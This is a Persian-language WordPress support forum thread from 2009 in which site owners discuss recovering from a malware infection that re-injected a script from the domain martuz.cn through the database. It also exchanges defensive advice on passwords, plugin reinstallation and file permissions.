    ۱۴ خرداد ۱۳۸۸ - ۱۱:۳۸

    آیا امکان نفوذ به FTP یک هاست با بروزرسانی افزونه ها در بخش مدیریت بیشتر می شه؟

    http://forum.wp-persian.com/topic/4202?replies=1#post-30391

    از اونجائی که اصلی ترین راه نفوذ به دو آدرس از بنده نفوذ بوسیله FTP بود به این مورد هم خیلی مشکوکم , اینبار که اصلا کلا حساب اصلی FTP هاست هارو غیرفعال کردم , با این حساب دیگه راه نفوذ دیگه ای هم باقی می مونه.

    این نفوذها بیشتر بوسیله نرم افزار صورت می گیره.

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۴ خرداد ۱۳۸۸ - ۱۴:۱۵

    به گفته یکی از دوستان, رمز های ftp و cpanel را هیچ وقت روی سیستم خودت که میدونی مطمئن هست save passwor نکن
    اگر اون فایل را پاک کردی و کدهای آلوده که توی بعضی از فایل ها بود پاک کردی به سراغ افزونه هایت هم برو
    به نظر من یه لیستی ازشون تهیه کن و همرو پاک کن و آخرین نسخه اشون رو از wordpress.org دانلود و بارگزاری کن.
    در ضمن این ویروس به صورت کد در افزونه هایی مانند wp-ban - wp-ads و مشابه های این افزونه, نفوذ میکنه, یعنی اگر در قالب جایی برای ورود html هست اونم حتما چک کن

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۴ خرداد ۱۳۸۸ - ۱۵:۱۲

    mostafa1990 گفت:
    به گفته یکی از دوستان, رمز های ftp و cpanel را هیچ وقت روی سیستم خودت که میدونی مطمئن هست save passwor نکن
    اگر اون فایل را پاک کردی و کدهای آلوده که توی بعضی از فایل ها بود پاک کردی به سراغ افزونه هایت هم برو
    به نظر من یه لیستی ازشون تهیه کن و همرو پاک کن و آخرین نسخه اشون رو از wordpress.org دانلود و بارگزاری کن.
    در ضمن این ویروس به صورت کد در افزونه هایی مانند wp-ban - wp-ads و مشابه های این افزونه, نفوذ میکنه, یعنی اگر در قالب جایی برای ورود html هست اونم حتما چک کن

    در مورد اون Save Password این فقط یه حالت برای لو رفتن و انونم بدون اطلاع کاربر داره که روی سیستم Keylogger وجود داشته باشه که خدارو شکر هرچی بود رو پاک کردم.

    افزونه ها همه بروز شده هستن , از اون دو افزونه هم هیچ وقت استفاده نکردم.

    ولی این مورد محدود کردن سطح دسترسی ها فکر می کنم خیلی می تونه کمک کنه , چون حتی اگه کدی هم باقی مونده باشه دیگه با تغییر کلمه های عبور و بستن FTP راه برگشتی ندارن.

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۴ خرداد ۱۳۸۸ - ۲۱:۵۶

    مشکل رو پیدا کردم , از اونجائی که به امکان اصلاح پایگاه داده و دوباره ارسال کردن همه اطلاعات اون برام مقدور نبود از اطلاعات همون پایگاه داده قبل استفاده کردم , تمام فایل های برنامه , پوسته , افزونه ها از نو بارگذاری شدن , از اونجائی که 100% مطمئن بودم که مشکل از اطلاعات پایگاه داده (نفوذ به اون) هست بعد از وارد کردن اطلاعات اون وبلاگ رو باز کردم که متوجه شدم درستیه اطمینانم شدم , دامنه آلوده

    martuz.cn

    بصورت خودکار همراه با بارگذاری صفحه فراخونی می شد , فایل wp-function.php دوباره آلوده شده بود , اینبار بوسیله اطلاعات پایگاه داده و دقیقا سر همون قضیه کدهای که پیشتر بهشون اشاره کرده بودم , دوستان به اینجا توجه کنن که نویسنده این ویروس بوسیله پایگاه داده اطلاعات مربوط به این دامنه آلوده رو بصورت کد شده جاوا اسکریپت تو فایل های مورد نیاز بارگذاری برنامه کپی می کنه , فایل رو ویرایش و سطح دسترسی اون و همه فایل های پوسته و افزونه ها رو به 444 تقلیل دادم.

    فقط می تونم بگم این بدترین بخش کار بود چون این آدرس بصورت درست هیچ کجای برنامه وجود نداشت.

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۹ تیر ۱۳۸۸ - ۱۹:۰۷

    آقا بعد رفع عیب چطوری می تونم بفهمم که مشکل کامل رفع شده؟
    از طریق گوگل که نمی شه چون طول می کشه

درباره‌ی این موضوع